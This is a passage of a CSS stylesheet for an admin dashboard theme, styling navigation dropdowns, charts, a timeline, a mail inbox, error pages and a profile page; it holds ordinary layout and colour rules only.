display: block;
}
.dropdown-menu.inbox li a .subject .from {
font-size: 12px;
font-weight: 600;
}
.dropdown-menu.inbox li a .subject .time {
font-size: 11px;
font-style: italic;
font-weight: bold;
position: absolute;
right: 5px;
}
.dropdown-menu.inbox li a .message {
display: block !important;
font-size: 11px;
}
.top-nav {
margin-top: 7px;
}
.top-nav ul.top-menu > li .dropdown-menu.logout {
width: 268px !important;
}
.top-nav li.dropdown .dropdown-menu {
float: right;
right: 0;
left: auto;
}
.dropdown-menu.extended.logout > li {
float: left;
text-align: center;
width: 33.3%;
}
.dropdown-menu.extended.logout > li:last-child {
float: left;
text-align: center;
width: 100%;
background: #a9d96c;
border-radius: 0 0 3px 3px;
}
.dropdown-menu.extended.logout > li:last-child > a, .dropdown-menu.extended.logout > li:last-child > a:hover {
color: #fff;
border-bottom: none !important;
text-transform: uppercase;
}
.dropdown-menu.extended.logout > li:last-child > a:hover > i{
color: #fff;
}
.dropdown-menu.extended.logout > li > a {
color: #a4abbb;
border-bottom: none !important;
}
.full-width .dropdown-menu.extended.logout > li > a:hover {
background: none !important;
color: #50c8ea !important;
}
.dropdown-menu.extended.logout > li > a:hover {
background: none !important;
}
.dropdown-menu.extended.logout > li > a:hover i {
color: #50c8ea;
}
.dropdown-menu.extended.logout > li > a i {
font-size: 17px;
}
.dropdown-menu.extended.logout > li > a > i {
display: block;
}
.top-nav .username {
font-size: 13px;
color: #555555;
}
.top-nav ul.top-menu > li > a {
border: 1px solid #eeeeee;
border-radius: 4px;
-webkit-border-radius: 4px;
padding: 6px;
background: none;
margin-right: 0;
}
.top-nav ul.top-menu > li {
margin-left: 10px;
}
.top-nav ul.top-menu > li > a:hover, .top-nav ul.top-menu > li > a:focus {
border:1px solid #F1F2F7;
background: #F1F2F7;
}
.top-nav .dropdown-menu.extended.logout {
top: 50px;
}
.top-nav .nav .caret {
border-bottom-color: #A4AABA;
border-top-color: #A4AABA;
}
.top-nav ul.top-menu > li > a:hover .caret {
border-bottom-color: #000;
border-top-color: #000;
}
.log-arrow-up {
background: url("../img/arrow-up.png") no-repeat;
width: 20px;
height: 11px;
position: absolute;
right: 20px;
top: -10px;
}
/*----*/
.notify-arrow {
border-style: solid;
border-width: 0 9px 9px;
height: 0;
margin-top: 0;
opacity: 0;
position: absolute;
left: 7px;
top: -18px;
transition: all 0.25s ease 0s;
width: 0;
z-index: 10;
margin-top: 10px;
opacity: 1;
}
.notify-arrow-yellow {
border-color: transparent transparent #FCB322;
border-bottom-color: #FCB322 !important;
border-top-color: #FCB322 !important;
}
.notify-arrow-red {
border-color: transparent transparent #ff6c60;
border-bottom-color: #ff6c60 !important;
border-top-color: #ff6c60 !important;
}
.notify-arrow-green {
border-color: transparent transparent #a9d86e;
border-bottom-color: #a9d86e !important;
border-top-color: #a9d86e !important;
}
/*search*/
.search {
margin-top: 6px ;
width: 20px;
-webkit-transition: all .3s ease;
-moz-transition: all .3s ease;
-ms-transition: all .3s ease;
-o-transition: all .3s ease;
transition: all .3s ease;
border: 1px solid #fff;
box-shadow: none;
background: url("../img/search-icon.jpg") no-repeat 10px 8px;
padding:0 5px 0 35px;
color: #fff;
}
.search:focus {
margin-top: 5px ;
width: 180px;
border: 1px solid #eaeaea;
box-shadow: none;
-webkit-transition: all .3s ease;
-moz-transition: all .3s ease;
-ms-transition: all .3s ease;
-o-transition: all .3s ease;
transition: all .3s ease;
color: #c8c8c8;
font-weight: 300;
}
/*--sidebar toggle---*/
.sidebar-toggle-box {
float: left;
padding-right: 15px;
margin-top: 20px;
}
.sidebar-toggle-box .icon-reorder {
cursor: pointer;
display: inline-block;
font-size: 20px;
}
.sidebar-closed > #sidebar > ul {
display: none;
}
.sidebar-closed #main-content {
margin-left: 0px;
}
.sidebar-closed #sidebar {
margin-left: -180px;
}
/*state overview*/
.state-overview .symbol, .state-overview .value {
display: inline-block;
text-align: center;
}
.state-overview .value {
float: right;
}
.state-overview .value h1, .state-overview .value p {
margin: 0;
padding: 0;
color: #c6cad6;
}
.state-overview .value h1 {
font-weight: 300;
}
.state-overview .symbol i {
color: #fff;
font-size: 50px;
}
.state-overview .symbol {
width: 40%;
padding: 25px 15px;
-webkit-border-radius: 4px 0px 0px 4px;
border-radius: 4px 0px 0px 4px;
}
.state-overview .value {
width: 58%;
padding-top: 21px;
}
.state-overview .terques {
background: #6ccac9;
}
.state-overview .red {
background: #ff6c60;
}
.state-overview .yellow {
background: #f8d347;
}
.state-overview .blue {
background: #57c8f2;
}
/*main chart*/
.border-head h3 {
border-bottom: 1px solid #c9cdd7;
margin-top: 0;
margin-bottom: 20px;
padding-bottom: 5px;
font-weight: normal;
font-size: 18px;
display: inline-block;
width: 100%;
font-weight: 300;
}
.custom-bar-chart {
height: 290px;
margin-top: 20px;
margin-left: 10px;
position: relative;
border-bottom: 1px solid #c9cdd7;
}
.custom-bar-chart .bar {
height: 100%;
position: relative;
width: 4.3%;
margin: 0px 2%;
float: left;
text-align: center;
-webkit-border-radius: 5px 5px 0 0;
-moz-border-radius: 5px 5px 0 0x;
border-radius: 5px 5px 0 0;
z-index: 10;
}
.custom-bar-chart .bar .title {
position: absolute;
bottom: -30px;
width: 100%;
text-align: center;
font-size: 12px;
}
.custom-bar-chart .bar .value {
position: absolute;
bottom: 0;
background: #bfc2cd;
color: #bfc2cd;
width: 100%;
-webkit-border-radius: 5px 5px 0 0;
-moz-border-radius: 5px 5px 0 0;
border-radius: 5px 5px 0 0;
-webkit-transition: all .3s ease;
-moz-transition: all .3s ease;
-ms-transition: all .3s ease;
-o-transition: all .3s ease;
transition: all .3s ease;
}
.custom-bar-chart .bar .value:hover {
background: #e8403f;
color: #fff;
}
.y-axis {
color: #555555;
position: absolute;
text-align: right;
width: 100%;
}
.y-axis li {
border-top: 1px dashed #dbdce0;
display: block;
height: 58px;
width: 100%;
}
.y-axis li:last-child {
border-top: none;
}
.y-axis li span {
display: block;
margin: -10px 0 0 -25px;
padding: 0 10px;
width: 40px;
}
.y-axis {
color: #555555;
text-align: right;
}
/*spark line*/
.chart {
display: inline-block;
text-align: center;
width: 100%;
}
.chart .heading {
text-align: left;
}
.chart .heading span {
display: block;
}
.panel.green-chart .chart-tittle {
font-size: 16px;
padding: 15px;
display: inline-block;
font-weight:normal;
background: #99c262;
width: 100%;
-webkit-border-radius: 0px 0px 4px 4px;
border-radius: 0px 0px 4px 4px;
}
#barchart {
margin-bottom: -15px;
display: inline-block;
}
.chart-tittle .title {
}
.panel.green-chart .chart-tittle .value {
float: right;
color: #c0f080;
}
.panel.green-chart {
background: #a9d96c;
color: #fff;
}
.panel.terques-chart {
background: #41cac0;
color: #fff;
}
.panel.terques-chart .chart-tittle .value {
float: right;
color: #fff;
}
.panel.terques-chart .chart-tittle .value a {
color: #fff;
font-size: 12px;
}
.panel.terques-chart .chart-tittle .value a:hover, .panel.terques-chart .chart-tittle .value a.active {
color: #55f2e7;
font-size: 12px;
}
.panel.terques-chart .chart-tittle {
font-size: 16px;
padding: 15px;
display: inline-block;
font-weight:normal;
background: #39b7ac;
width: 100%;
-webkit-border-radius: 0px 0px 4px 4px;
border-radius: 0px 0px 4px 4px;
}
.inline-block {
display: inline-block;
}
/**/
.panel-body.chart-texture {
background: url("../img/chart-texture.jpg");
-webkit-border-radius: 4px 4px 0px 0px;
border-radius: 4px 4px 0px 0px;
}
/*personal task*/
.task-thumb {
width: 90px;
float: left;
}
.task-thumb img {
border-radius: 4px;
-webkit-border-radius: 4px;
}
.task-thumb-details {
display: inline-block;
margin: 25px 0 0 10px;
}
.task-progress {
float: left;
}
.task-thumb-details h1, .task-thumb-details h1 a, .task-progress h1, .task-progress h1 a {
color: #39b5aa;
font-size: 18px;
margin: 0;
padding: 0;
font-weight: 400;
}
.task-thumb-details p, .task-progress p {
padding-top: 5px;
color: #a4aaba;
}
.personal-task tbody tr td{
padding: 11px 15px;
border-color: #eeeff1;
}
.personal-task tbody tr td i {
font-size: 20px;
color: #c7cbd4;
}
.personal-task.table-hover > tbody > tr:hover > td,
.table-hover > tbody > tr:hover > th {
background-color: #f7f8fc;
}
.personal-task.table-hover > tbody > tr:hover > td i{
color: #39b5aa;
}
.personal-task > tbody > tr > td:last-child {
text-align: right;
}
.task-option {
float: right;
}
.task-option select{
height: 35px;
border: 1px solid #eaeaea;
border-radius: 4px;
-webkit-border-radius: 4px;
padding: 8px;
color: #a4abbb;
}
.progress-panel {
padding-bottom: 5px;
}
/*badge*/
.badge.bg-primary {
background: #8075c4;
}
.badge.bg-success {
background: #a9d86e;
}
.badge.bg-warning {
background: #FCB322;
}
.badge.bg-important {
background: #ff6c60;
}
.badge.bg-info {
background: #41cac0;
}
.badge.bg-inverse {
background: #2A3542;
}
/*timeline*/
.timeline {
border-collapse: collapse;
border-spacing: 0;
display: table;
position: relative;
table-layout: fixed;
width: 100%;
}
.timeline:before {
background-color: #C7CBD6;
bottom: 0px;
content: "";
left: 50%;
position: absolute;
top: 0;
width: 2px;
z-index: 0;
}
h3.timeline-title {
margin: 0;
color: #C8CCD7;
font-size: 20px;
font-weight: 400;
margin: 0 0 5px;
text-transform: uppercase;
}
.t-info {
color: #C8CCD7;
}
.timeline-item:before, .timeline-item.alt:after {
content: "";
display: block;
width: 50%;
}
.timeline-item {
display: table-row;
}
.timeline-desk {
display: table-cell;
vertical-align: top;
width: 50%;
}
.timeline-desk h1 {
font-size: 16px;
font-weight: 300;
margin: 0 0 5px;
}
.timeline-desk .panel {
display: block;
margin-left: 25px;
position: relative;
text-align: left;
background: #F4F4F4;
}
.timeline-item .timeline-desk .arrow {
border-bottom: 8px solid transparent;
border-top: 8px solid transparent;
display: block;
height: 0;
left: -7px;
position: absolute;
top: 13px;
width: 0;
}
.timeline-item .timeline-desk .arrow {
border-right: 8px solid #F4F4F4 !important;
}
.timeline-item.alt .timeline-desk .arrow-alt {
border-bottom: 8px solid transparent;
border-top: 8px solid transparent;
display: block;
height: 0;
right: -7px;
position: absolute;
top: 13px;
width: 0;
left: auto;
}
.timeline-item.alt .timeline-desk .arrow-alt {
border-left: 8px solid #F4F4F4 !important;
}
.timeline .timeline-icon {
left: -30px;
position: absolute;
top: 15px;
}
.timeline .timeline-icon {
background: #C7CBD6;
box-shadow: 0 0 0 3px #C7CBD6;
}
.timeline-desk span a {
text-transform: uppercase;
}
.timeline-desk h1.red, .timeline-desk span a.red {
color: #EF6F66;
}
.timeline-desk h1.green, .timeline-desk span a.green {
color: #39B6AE;
}
.timeline-desk h1.blue, .timeline-desk span a.blue {
color: #56C9F5;
}
.timeline-desk h1.purple, .timeline-desk span a.purple {
color: #8074C6;
}
.timeline-desk h1.light-green, .timeline-desk span a.light-green {
color: #A8D76F;
}
.timeline .timeline-icon.red {
background: #EF6F66;
box-shadow: 0 0 0 3px #EF6F66;
}
.timeline .timeline-icon.green {
background: #39B6AE;
box-shadow: 0 0 0 3px #39B6AE;
}
.timeline .timeline-icon.blue {
background: #56C9F5;
box-shadow: 0 0 0 3px #56C9F5;
}
.timeline .timeline-icon.purple {
background: #8074C6;
box-shadow: 0 0 0 3px #8074C6;
}
.timeline .timeline-icon.light-green {
background: #A8D76F;
box-shadow: 0 0 0 3px #A8D76F;
}
.timeline .timeline-icon {
border: 3px solid #FFFFFF;
border-radius: 50%;
-webkit-border-radius: 50%;
display: block;
height: 12px;
width: 12px;
}
.timeline-item.alt .timeline-icon {
left: auto;
right: -32px;
}
.timeline .time-icon:before {
font-size: 16px;
margin-top: 5px;
}
.timeline .timeline-date {
left: -200px;
position: absolute;
text-align: right;
top: 12px;
width: 150px;
}
.timeline-desk h5 span {
color: #999999;
display: block;
font-size: 12px;
margin-bottom: 4px;
}
.timeline-item.alt:before {
display: none;
}
.timeline-item:before, .timeline-item.alt:after {
content: "";
display: block;
width: 50%;
}
.timeline-desk p {
font-size: 12px;
margin-bottom: 0;
}
.timeline-desk a {
color: #EF6F66;
}
.timeline-desk .panel {
margin-bottom: 5px;
}
.timeline-desk .album {
margin-top: 20px;
}
.timeline-desk .album a {
margin-right: 5px;
float: left;
}
.timeline-desk .notification {
background: none repeat scroll 0 0 #FFFFFF;
margin-top: 20px;
padding: 8px;
}
.timeline-item.alt .panel {
margin-left: 0;
margin-right: 25px;
}
.timeline-item.alt .timeline-date {
left: auto;
right: -200px;
text-align: left;
}
.mbot30 {
margin-bottom: 30px;
}
/*---revenue----*/
.revenue-head {
background: #ff6c60;
-webkit-border-radius: 4px 4px 0px 0px;
border-radius: 4px 4px 0px 0px;
color: #fff;
line-height: 50px;
}
.revenue-head span {
background: #e56155;
padding: 16px;
-webkit-border-radius: 4px 0px 0px 0px;
border-radius: 4px 0px 0px 0px;
}
.revenue-head span i {
font-size: 18px;
}
.revenue-head h3 {
display: inline;
padding: 0 10px;
font-size: 16px;
font-weight: 300;
}
.revenue-head span.rev-combo {
background: #e56155;
padding: 16px;
line-height: normal;
-webkit-border-radius: 0px 4px 0px 0px;
border-radius: 0px 4px 0px 0px;
}
/*easy pie chart*/
.easy-pie-chart {
display: inline-block;
padding: 30px 0;
}
.chart-info, .chart-info .increase, .chart-info .decrease {
display: inline-block;
}
.chart-info {
width: 100%;
margin-bottom:5px;
}
.chart-position {
margin-top: 70px;
}
.chart-info span {
margin: 0 3px;
}
.chart-info .increase {
background: #ff6c60;
width: 10px;
height: 10px;
}
.chart-info .decrease {
background: #f2f2f2;
width: 10px;
height: 10px;
}
.panel-footer.revenue-foot {
background-color: #e6e7ec;
-webkit-border-radius: 0px 0px 4px 4px;
border-radius: 0px 0px 4px 4px;
border: none;
padding: 0;
width: 100%;
display: inline-block;
}
@media screen and (-webkit-min-device-pixel-ratio:0) {
/* Safari and Chrome */
.panel-footer.revenue-foot {
margin-bottom: -4px;
};
}
.panel-footer.revenue-foot ul {
margin: 0;
padding: 0;
width: 100%;
display: inline-flex;
}
.panel-footer.revenue-foot ul li {
float: left;
width: 33.33%;
}
.panel-footer.revenue-foot ul li.first a:hover, .panel-footer.revenue-foot ul li.first a {
-webkit-border-radius: 0px 0px 0px 4px;
border-radius: 0px 0px 0px 4px;
}
.panel-footer.revenue-foot ul li.last a:hover, .panel-footer.revenue-foot ul li.last a {
-webkit-border-radius: 0px 0px 4px 0px;
border-radius: 0px 0px 4px 0px;
border-right: none;
}
.panel-footer.revenue-foot ul li a{
display: inline-block;
width: 100%;
padding: 14px 15px;
text-align: center;
border-right: 1px solid #d5d8df;
color: #797979;
}
.panel-footer.revenue-foot ul li a:hover, .panel-footer.revenue-foot ul li.active a {
background: #fff;
position: relative;
}
.panel-footer.revenue-foot ul li a i {
color: #c6cad5;
display: block;
font-size: 16px;
}
.panel-footer.revenue-foot ul li a:hover i, .panel-footer.revenue-foot ul li.active a i {
color: #ff6c60;
display: block;
font-size: 16px;
}
/*flatlab carousel model*/
.flat-carousal {
background: #58c9f3;
-webkit-border-radius: 4px 4px 0px 0px;
border-radius: 4px 4px 0px 0px;
padding: 10px;
color: #fff;
position: relative;
}
.flat-carousal h1 {
text-align: center;
font-size: 16px;
margin: 30px 20px;
line-height: 20px;
font-weight: 300;
font-style: italic;
}
a.view-all {
color: #fff;
background: rgba(0,0,0,0.1);
padding: 8px 15px;
text-align: center;
border-radius: 25px;
-webkit-border-radius: 25px;
margin-bottom: 18px;
display: inline-block;
text-transform: uppercase;
font-size: 12px;
}
ul.ft-link {
margin: 0;
padding: 0;
}
ul.ft-link li {
border-right: 1px solid #E6E7EC;
display: inline-block;
line-height: 30px;
margin: 8px 0;
text-align: center;
width: 24%;
}
ul.ft-link li a {
color: #74829c;
text-transform: uppercase;
font-size: 12px;
}
ul.ft-link li a:hover, ul.ft-link li.active a {
color: #58c9f3;
}
ul.ft-link li:last-child {
border-right: none;
}
ul.ft-link li a i {
display: block;
}
#owl-demo .item img{
display: block;
width: 100%;
height: auto;
}
.owl-buttons {
position: absolute;
top: 70px;
width: 100%;
}
.owl-prev, .owl-next {
position: absolute;
}
.owl-next {
right: 0;
}
.owl-buttons .owl-prev {
text-indent: -9999px;
background: url("../img/left-arrow.png") no-repeat;
width: 6px;
height: 10px;
display: inline-block;
}
.owl-buttons .owl-next {
text-indent: -9999px;
background: url("../img/right-arrow.png") no-repeat;
width: 6px;
height: 10px;
display: inline-block;
}
/*product post*/
.post-wrap aside {
display: table-cell;
float: none;
height: 100%;
padding: 0;
vertical-align: top;
}
.pro-box {
border-collapse: collapse;
border-spacing: 0;
display: table;
table-layout: fixed;
width: 100%;
}
.post-info {
position: relative;
}
.arrow-pro.right:after {
border-left-color: #FFFFFF;
border-right-width: 0;
top: 85px;
content: " ";
}
.arrow-pro.left:after {
border-right-color: #FFFFFF;
border-left-width: 0;
top: 80px;
content: " ";
}
.arrow-pro.left {
left: -8px;
}
.arrow-pro:after {
border-width: 7px;
content: "";
}
.arrow-pro, .arrow-pro:after {
border-color: rgba(0, 0, 0, 0);
border-style: solid;
display: block;
height: 0;
position: absolute;
width: 0;
right: -5px;
}
.post-highlight.yellow {
background: #f8d347;
border-radius: 0px 4px 4px 0px;
-webkit-border-radius: 0px 4px 4px 0px;
}
.post-highlight.terques {
background: #41cac0;
border-radius: 4px 0px 0px 04px;
-webkit-border-radius: 4px 0px 0px 04px;
}
.post-info h1 {
margin: 0;
font-size: 18px;
color: #a19899;
font-weight: 300;
}
.post-highlight.terques h2 {
font-size: 16px;
color: #fff;
font-style: italic;
padding: 0 20px;
line-height: 22px;
margin: 0;
font-weight: 300;
}
.post-highlight.terques h2 span, .post-highlight.terques h2 a {
color: #92faf3;
}
.post-info h1 strong {
text-transform: uppercase;
color: #937b7b;
}
.post-info .desk {
display: inline-block;
}
.post-info .desk h3{
font-size: 16px;
}
.post-info .desk.yellow h3 {
color:#f8d347 ;
}
.post-btn {
}
.post-btn a {
float: left;
margin-right: 8px;
font-size: 18px;
color: #9a9a9a;
}
.post-btn a:hover {
color: #727272;
}
.pro-thumb {
text-align: center;
display: inline-block;
border-radius: 50%;
-webkit-border-radius: 50%;
border: 10px solid rgba(256,256,256,0.4);
}
.pro-thumb img{
text-align: center;
width: 112px;
height: 112px;
border-radius: 50%;
-webkit-border-radius: 50%;
}
.v-align {
vertical-align: middle !important;
}
.twite h1 {
margin: 50px 0;
}
.social-footer {
display: inline;
text-align: center;
}
.social-footer ul {
text-align: center;
margin: 0;
padding: 0;
}
.social-footer ul li {
display: inline-block;
margin: 0 20px;
}
.social-footer ul li a {
font-size: 25px;
color: #ceced0;
}
.social-footer ul li a:hover i.icon-facebook, .social-footer ul li.active a i.icon-facebook {
color: #486eac;
}
.social-footer ul li a:hover i.icon-twitter, .social-footer ul li.active a i.icon-twitter {
color: #58c9f3;
}
.social-footer ul li a:hover i.icon-google-plus, .social-footer ul li.active a i.icon-google-plus {
color: #4a4a4a;
}
.social-footer ul li a:hover i.icon-pinterest, .social-footer ul li.active a i.icon-pinterest {
color: #d1282d;
}
/*pie chart */
.pie-foot {
background: #6b6b6b;
padding: 18px 15px;
color: #fff;
border-radius: 0 0 4px 4px;
-webkit-border-radius: 0 0 4px 4px;
text-align: center;
font-size: 16px;
font-weight: 300;
}
/*follower*/
.follower {
background: #01a89e;
color: #fff;
text-align: center;
border-radius: 4px 4px 0 0;
-webkit-border-radius: 4px 4px 0 0;
}
.follower-foot {
padding: 8px 5px 5px 5px;
color: #757575;
border-radius: 0 0 4px 4px;
-webkit-border-radius: 0 0 4px 4px;
font-weight: 300;
}
.follower-foot ul {
padding: 0;
margin: 0;
}
.follower-foot ul li{
display: inline-block;
text-align: center;
width: 48%;
line-height: normal;
}
.follower-foot ul li h5{
margin: 5px 0 0 0;
}
.follower h4 {
margin: 0 0 10px 0;
font-size: 15px;
font-weight: 300;
}
.follow-ava {
border-radius: 50%;
-webkit-border-radius: 50%;
border: 5px solid #18b2a6;
display: inline-block;
}
.follower img {
border-radius: 50%;
-webkit-border-radius: 50%;
width: 62px;
height: 62px;
/*display: inline-block;*/
}
/*weather*/
.weather-bg {
background: #8175c7;
border-radius: 4px 4px 0 0;
-webkit-border-radius: 4px 4px 0 0;
color: #fff;
text-align: center;
font-size: 16px;
font-weight: 300;
}
.weather-bg i {
font-size: 60px;
display: block;
}
.weather-bg .degree {
font-size: 60px;
}
.weather-category {
padding: 15px 0;
color: #74829C;
}
.weather-category ul {
padding:0;
margin: 0;
display: inline-block;
width: 100%;
}
.weather-category ul li {
display: inline-block;
width: 32%;
text-align: center;
border-right:1px solid #e6e6e6 ;
display: inline-block;
}
.weather-category ul li h5 {
margin: 0 0 5px 0;
text-transform: uppercase;
font-weight: 300;
}
.weather-category ul li a {
}
.weather-category ul li:last-child {
border-right:none ;
}
/*fontawesome*/
.fontawesome-icon-list h2 {
margin-top: 0;
font-size: 20px;
font-weight: 300;
}
.fontawesome-icon-list .col-sm-3 {
margin-bottom: 10px;
}
.fontawesome-icon-list .page-header {
border-bottom: 1px solid #C9CDD7;
}
.fontawesome-icon-list i {
font-size: 16px;
padding-right: 10px;
}
#web-application, #text-editor, #directional, #video-player, #brand, #medical, #currency {
margin-top: 10px;
}
/*mail inbox*/
.mail-box {
border-collapse: collapse;
border-spacing: 0;
display: table;
table-layout: fixed;
width: 100%;
}
.mail-box aside {
display: table-cell;
float: none;
height: 100%;
padding: 0;
vertical-align: top;
}
.mail-box .sm-side {
width: 25%;
background: #e5e8ef;
border-radius: 4px 0 0 4px;
-webkit-border-radius: 4px 0 0 4px;
}
.mail-box .lg-side {
width: 75%;
background: #fff;
border-radius: 0px 4px 4px 0;
-webkit-border-radius: 0px 4px 4px 0;
}
.mail-box .sm-side .user-head {
background: #00a8b3;
border-radius: 4px 0px 0px 0;
-webkit-border-radius: 4px 0px 0px 0;
padding: 10px;
color: #fff;
min-height: 80px;
}
.user-head .inbox-avatar {
width: 65px;
float: left;
}
.user-head .inbox-avatar img {
border-radius: 4px;
-webkit-border-radius: 4px;
}
.user-head .user-name {
display: inline-block;
margin:0 0 0 10px;
}
.user-head .user-name h5 {
font-size: 14px;
margin-top: 15px;
margin-bottom: 0;
font-weight: 300;
}
.user-head .user-name h5 a {
color: #fff;
}
.user-head .user-name span a {
font-size: 12px;
color: #87e2e7;
}
a.mail-dropdown {
background: #80d3d9;
padding:3px 5px;
font-size: 10px;
color: #01a7b3;
border-radius: 2px;
margin-top: 20px;
}
.inbox-body {
padding: 20px;
}
.btn-compose {
background: #ff6c60;
padding: 12px 0;
text-align: center;
width: 100%;
color: #fff;
}
.btn-compose:hover {
background: #f5675c;
color: #fff;
}
ul.inbox-nav {
display: inline-block;
width: 100%;
margin: 0;
padding: 0;
}
.inbox-divider {
border-bottom: 1px solid #d5d8df;
}
ul.inbox-nav li {
display: inline-block;
line-height: 45px;
width: 100%;
}
ul.inbox-nav li a {
color: #6a6a6a;
line-height: 45px;
width: 100%;
display: inline-block;
padding: 0 20px;
}
ul.inbox-nav li a:hover, ul.inbox-nav li.active a, ul.inbox-nav li a:focus {
color: #6a6a6a;
background: #d5d7de;
}
ul.inbox-nav li a i {
padding-right: 10px;
font-size: 16px;
color: #6a6a6a;
}
ul.inbox-nav li a span.label {
margin-top: 13px;
}
ul.labels-info li h4 {
padding-left:15px;
padding-right:15px;
padding-top: 5px;
color: #5c5c5e;
font-size: 13px;
text-transform: uppercase;
}
ul.labels-info li {
margin: 0;
}
ul.labels-info li a {
color: #6a6a6a;
border-radius: 0;
}
ul.labels-info li a:hover, ul.labels-info li a:focus {
color: #6a6a6a;
background: #d5d7de;
}
ul.labels-info li a i {
padding-right: 10px;
}
.nav.nav-pills.nav-stacked.labels-info p {
margin-bottom: 0;
padding: 0 22px;
color: #9d9f9e;
font-size: 11px;
}
.inbox-head {
padding:20px;
background: #41cac0;
color: #fff;
border-radius: 0 4px 0 0;
-webkit-border-radius: 0 4px 0 0;
min-height: 80px;
}
.inbox-head h3 {
margin: 0;
display: inline-block;
padding-top: 6px;
font-weight: 300;
}
.inbox-head .sr-input {
height: 40px;
border: none;
box-shadow: none;
padding: 0 10px;
float: left;
border-radius: 4px 0 0 4px;
color: #8a8a8a;
}
.inbox-head .sr-btn {
height: 40px;
border: none;
background: #00a6b2;
color: #fff;
padding: 0 20px;
border-radius: 0 4px 4px 0;
-webkit-border-radius: 0 4px 4px 0;
}
.table-inbox {
border: 1px solid #d3d3d3;
margin-bottom: 0;
}
.table-inbox tr td{
padding: 12px !important;
}
.table-inbox tr td:hover{
cursor: pointer;
}
.table-inbox tr td .icon-star.inbox-started ,.table-inbox tr td .icon-star:hover{
color: #f78a09;
}
.table-inbox tr td .icon-star{
color: #d5d5d5;
}
.table-inbox tr.unread td {
font-weight: 600;
background: #f7f7f7;
}
ul.inbox-pagination {
float: right;
}
ul.inbox-pagination li {
float: left;
}
.mail-option {
display: inline-block;
margin-bottom: 10px;
width: 100%;
}
.mail-option .chk-all, .mail-option .btn-group {
margin-right: 5px;
}
.mail-option .chk-all, .mail-option .btn-group a.btn {
border: 1px solid #e7e7e7;
padding: 5px 10px;
display: inline-block;
background: #fcfcfc;
color: #afafaf;
border-radius: 3px !important;
-webkit-border-radius: 3px !important;
}
.inbox-pagination a.np-btn {
border: 1px solid #e7e7e7;
padding: 5px 15px;
display: inline-block;
background: #fcfcfc;
color: #afafaf;
border-radius: 3px !important;
-webkit-border-radius: 3px !important;
}
.mail-option .chk-all input[type=checkbox] {
margin-top: 0;
}
.mail-option .btn-group a.all {
padding: 0;
border: none;
}
.inbox-pagination a.np-btn {
margin-left: 5px;
}
.inbox-pagination li span {
display: inline-block;
margin-top: 7px;
margin-right: 5px;
}
.fileinput-button {
border: 1px solid #e6e6e6;
background: #eeeeee;
}
.inbox-body .modal .modal-body input, .inbox-body .modal .modal-body textarea{
border: 1px solid #e6e6e6;
box-shadow: none;
}
.btn-send, .btn-send:hover {
background: #00A8B3;
color: #fff;
}
.btn-send:hover {
background: #009da7;
}
.modal-header h4.modal-title {
font-weight: 300;
font-family: 'Open Sans', sans-serif;
}
.modal-body label {
font-weight: 400;
font-family: 'Open Sans', sans-serif;
}
/*404 page*/
.body-404 {
background: #18d4cb;
color: #fff;
}
.error-wrapper {
text-align: center;
margin-top: 10%;
}
.error-wrapper .icon-404{
background: url("../img/404_icon.png") no-repeat;
width: 289px;
height: 274px;
display: inline-block;
margin-left: 30px;
}
.error-wrapper h1 {
font-size: 90px;
font-weight: 300;
margin: -50px 0 0 0;
}
.error-wrapper h2 {
font-size: 20px;
font-weight: 300;
margin: 0 0 30px 0;
}
.error-wrapper p, .error-wrapper p a {
font-size: 18px;
font-weight: 300;
}
.error-wrapper p.page-404 {
color: #7dfff7;
}
.error-wrapper p.page-404 a, .error-wrapper p.page-500 a, .error-wrapper p.page-404 a:hover, .error-wrapper p.page-500 a:hover {
color: #fff;
}
/*500 page*/
.body-500 {
background: #8075c6;
color: #fff;
}
.error-wrapper p.page-500 {
color: #afa5f1;
}
.error-wrapper .icon-500{
background: url("../img/500_icon.png") no-repeat;
width: 289px;
height: 274px;
display: inline-block;
margin-left: 55px;
}
/*profile*/
.profile-nav .user-heading {
background: #ff766c;
color: #fff;
border-radius: 4px 4px 0 0;
-webkit-border-radius: 4px 4px 0 0;
padding: 30px;
text-align: center;
}
.profile-nav .user-heading.round a {
border-radius: 50%;
-webkit-border-radius: 50%;
border: 10px solid rgba(256,256,256,0.3);
display: inline-block;
}
.profile-nav .user-heading a img {
width: 112px;
height: 112px;
border-radius: 50%;
-webkit-border-radius: 50%;
}
.profile-nav .user-heading h1 {
font-size: 22px;
font-weight: 300;
margin-bottom: 5px;
}
.profile-nav .user-heading p {
font-size: 12px;
}
.profile-nav ul {
margin-top: 1px;
}
.profile-nav ul > li {
border-bottom: 1px solid #ebeae6;
margin-top: 0;
line-height: 30px;
}
.profile-nav ul > li:last-child {
border-bottom: none;
}
.profile-nav ul > li > a {
border-radius: 0;
-webkit-border-radius: 0;
color: #89817f;
border-left: 5px solid #fff;
}
.profile-nav ul > li > a:hover, .profile-nav ul > li > a:focus, .profile-nav ul li.active a {
background: #f8f7f5 !important;
border-left: 5px solid #ff766c;
color: #89817f !important;
}
.profile-nav ul > li:last-child > a:last-child {
border-radius: 0 0 4px 4px;
-webkit-border-radius: 0 0 4px 4px;
}
.profile-nav ul > li > a > i{
font-size: 16px;
padding-right: 10px;
color: #bcb3aa;
}
.r-activity {
margin: 6px 0 0;
font-size: 12px;
}
.p-text-area, .p-text-area:focus {
border: none;
font-weight: 300;
box-shadow: none;
color: #c3c3c3;
font-size: 16px;
}
.profile-info .panel-footer {
background-color:#f8f7f5 ;
border-top: 1px solid #e7ebee;
}
.profile-info .panel-footer ul li a {
color: #7a7a7a;
}
.bio-graph-heading {
background: #41cac0;
color: #fff;
text-align: center;
font-style: italic;
padding: 40px 110px;
border-radius: 4px 4px 0 0;
-webkit-border-radius: 4px 4px 0 0;
font-size: 16px;
font-weight: 300;
}
.bio-graph-info {
color: #89817e;
}
.bio-graph-info h1 {
font-size: 22px;
font-weight: 300;
margin: 0 0 20px;
}
.bio-row {
width: 50%;
float: left;
margin-bottom: 10px;
padding:0 15px;
}
.bio-row p span {
width: 100px;
display: inline-block;
}
.bio-chart, .bio-desk {
float: left;
}
.bio-chart {
width: 40%;
}
.bio-desk {
width: 60%;
}
.bio-desk h4 {
font-size: 15px;
font-weight:400;
}
.bio-desk h4.terques {
color: #4CC5CD;
}
.bio-desk h4.red {
color: #e26b7f;
}
.bio-desk h4.green {
color: #97be4b;
}
.bio-desk h4.purple {
color: #caa3da;
}
.file-pos {
margin: 6px 0 10px 0;
}
.profile-activity h5 {
font-weight: 300;
margin-top: 0;
color: #c3c3c3;
}
.summary-head {
background: #ee7272;
color: #fff;
text-align: center;
border-bottom: 1px solid #ee7272;
}
.summary-head h4 {
font-weight: 300;
text-transform: uppercase;
